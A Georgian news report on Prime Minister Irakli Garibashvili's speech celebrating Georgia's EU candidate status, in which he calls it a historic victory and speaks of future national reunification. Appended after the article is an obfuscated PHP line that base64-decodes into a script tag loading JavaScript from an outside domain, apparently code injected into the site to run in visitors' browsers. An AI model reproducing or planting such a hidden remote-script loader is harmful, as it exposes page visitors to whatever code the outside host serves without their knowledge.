celsiusi
ავერსი საქკაბელი

პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა ევროკავშირის წევრობის კანდიდატის სტატუსის მიღების აღსანიშნავ ღონისძიებაზე შეკრებილ მოქალაქეებს სიტყვით მიმართა და განაცხადა, რომ დღეიდან საქართველო ევროპული ქვეყანა გახდა.

საზეიმო ღონისძიება მთავრობის ორგანიზებით თავისუფლების მოედანზე მიმდინარეობს.

მისი თქმით, ეს არის ისტორიული გამარჯვება, რომელიც გაუტეხელ, ამაყ და თავისუფლებისმოყვარე ქართველ ხალხს ეკუთვნის.

„ჩვენ, ხელისუფლებამ და ხალხმა დამსახურებულად მოვიპოვეთ ევროკავშირის კანდიდატის სტატუსი. ჩვენ დავიმსახურეთ ეს გამარჯვება. ჩვენ ვიშრომეთ და ჩვენ ვიბრძოლეთ ქართველი ხალხის სახელით, თქვენი სახელით, ჩვენი ქვეყნის და ხალხისთვის და ჩვენ ერთად მოვიპოვეთ ეს გამარჯვება. დიახ, ჩვენ არ დავდექით ცალ ფეხზე და არ დავდექით მუხლისჩოქებზე, არამედ დავდექით მტკიცედ და ღირსეულად მოვიპოვეთ ეს გამარჯვება“,- განაცხადა ირაკლი ღარიბაშვილმა.

როგორც ღარიბაშვილმა თქვა, კანდიდატის სტატუსის მიღებით ხელისუფლებამ ხალხთან ერთად გაიმარჯვა და ქვეყნის შიდა თუ გარე მტრები დაამარცხა – ის „მოწინააღმდეგეები, რომლებიც ებრძოდნენ ქვეყნისთვის კანდიდატის სტატუსის მინიჭებას“.

„ჩვენ ასევე თავიდან ავიცილეთ მთავარი განსაცდელი – ომი და უბედურება. ჩვენ შევინარჩუნეთ მშვიდობა, დავიცავით ჩვენი ხალხი და ქვეყანა, გავაძლიერეთ ჩვენი ქვეყნის სუვერენიტეტი და დამოუკიდებლობა. 14 დეკემბერი და დღევანდელი დღე შევა საქართველოს ისტორიაში, როგორც ამაყი და ღირსეული ქართველი ერის დამსახურებული გამარჯვების ზეიმის დღე. დღეიდან საქართველო ევროპული ქვეყანა გახდა.

მინდა, მადლობა ვუთხრა ჩვენს ევროპელ მეგობრებს, ჩვენს მხარდამჭერებს, ჩვენს ამერიკელ მეგობრებს და გულშემატკივრებს“, – განაცხადა ღარიბაშვილმა.

თავისი სიტყვის ბოლოს კი ღარიბაშვილმა განაცხადა, რომ საქართველო კიდევ უფრო დიდი გამარჯვებისთვის – ქვეყნის გამთლიანებისთვის უნდა მოემზადოს.

„ახლა ჩვენ წინ დიდი გამარჯვება გველოდება, ჩვენ უნდა მოვემზადოთ კიდევ უფრო დიდი გამარჯვებისთვის. უფლის ნებით, ჩვენ უნდა შევძლოთ ჩვენი ქვეყნის გაერთიანება და ავიხდინოთ თითოეული მოქალაქის ოცნება, რომ ვიცხოვროთ ერთიან, ძლიერ ევროპულ სახელმწიფოში“, – განაცხადა ირაკლი ღარიბაშვილმა.

285
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");